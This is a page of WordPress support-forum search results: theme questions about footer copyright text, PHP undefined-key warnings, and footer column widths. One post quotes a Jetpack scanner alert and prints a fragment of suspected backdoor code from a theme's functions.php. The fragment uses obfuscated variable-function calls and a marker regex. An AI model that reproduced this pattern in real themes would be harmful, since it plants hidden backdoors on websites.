-
Search Results
-
Topic: Footer Copyright Change
Hey,
I’m using the bizness theme (the free version) and I would like to know where can I change the copyright text, I did add some text but can remove the original text? Also, I can add any links to the the social media icons, here is a link to a screenshot : https://imgur.com/a/T1lHXDM (The red block is what I’ve added in the footer.php!
Thanks.
Topic: PHP errors
Hi i have an old CutnStylePro theme on my website. I’m getting this warning on my website
<b>Warning</b>: Undefined array key ” image_title”=”” in=”” <b=”” style=”width: 1665px; visibility: hidden;”>The theme is 1.0. Installing 5.0 is giving alot of issues with the whole site being changed. Any help on resolving this issue is needed.
Regards,
Topic: Permanently Php Warnings
Hi.
Im Using the adventurer theme. I keep getting these Errors in my server. There seems to be a an issue with the testimonials. The script consumes a lot of memory.
Please help.
[13-Dec-2021 21:45:44 UTC] PHP Warning: Undefined array key “teambox_hvrdesig_color” in /home/blouhuis/public_html/wp-content/themes/adventure/templates/custom-style.php on line 308
[13-Dec-2021 21:45:44 UTC] PHP Warning: Undefined array key “singleservice_testibg_id” in /home/blouhuis/public_html/wp-content/themes/adventure/templates/custom-style.php on line 330
[13-Dec-2021 21:45:44 UTC] PHP Warning: Undefined array key “singleservice_testimonialtitle_id” in /home/blouhuis/public_html/wp-content/themes/adventure/templates/custom-style.php on line 331
[13-Dec-2021 21:45:44 UTC] PHP Warning: Undefined array key “singleservice_testimonialprofile_id” in /home/blouhuis/public_html/wp-content/themes/adventure/templates/custom-style.php on line 332Topic: malicious code
Can someone help me with this? Received a total of three. Is that code legit? It was a part of the zip file.
The file functions.php contains a malicious code pattern
Threat found (php_suspicious_variable_function_005)
More
What was the problem?Jetpack found a code pattern that is commonly present on known malicious code. This signature will flag any suspicious usage of PHP’s Variable functions. The code in these files needs to be reviewed, and possibly cleaned.
The technical details
Threat found in file:
/home1//public_html/wp-content/themes/skeleton-reworked/functions.php
41
42
43$reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);Topic: change widths of footer
Hi, I’m using solar energy theme and I want to adjust the size widths of the footer columns.
Using 3 footer columns, making the 1st column 25% and the other 2 equal size (or similar size).
How do I change the code for that?
I see :
<?php } if ($footertype == 3) {?>
<div class=”footercols3″ ><?php if (dynamic_sidebar(‘footer-1’)) : else : ?><h4><?php if (!empty ($complete[‘foot_cols1_title’])) { $ftcols1 = html_entity_decode($complete[‘foot_cols1_title’]); $ftcols1 = stripslashes($ftcols1); echo do_shortcode($ftcols1); } ?></h4><?php $ftcols1cntnt = $complete[‘foot_cols1_content’]; echo do_shortcode($ftcols1cntnt); endif;?></div>
<div class=”footercols3″><?php if (dynamic_sidebar(‘footer-2’)) : else : ?><h4><?php if (!empty ($complete[‘foot_cols2_title’])) { $ftcols2 = html_entity_decode($complete[‘foot_cols2_title’]); $ftcols2 = stripslashes($ftcols2); echo do_shortcode($ftcols2); } ?></h4><?php $ftcols2cntnt = $complete[‘foot_cols2_content’]; echo do_shortcode($ftcols2cntnt); endif;?></div>
<div class=”footercols3″><?php if (dynamic_sidebar(‘footer-3’)) : else : ?><h4><?php if (!empty ($complete[‘foot_cols3_title’])) { $ftcols3 = html_entity_decode($complete[‘foot_cols3_title’]); $ftcols3 = stripslashes($ftcols3); echo do_shortcode($ftcols3); } ?></h4><?php $ftcols3cntnt = $complete[‘foot_cols3_content’]; echo do_shortcode($ftcols3cntnt); endif;?></div>
<?php } ?>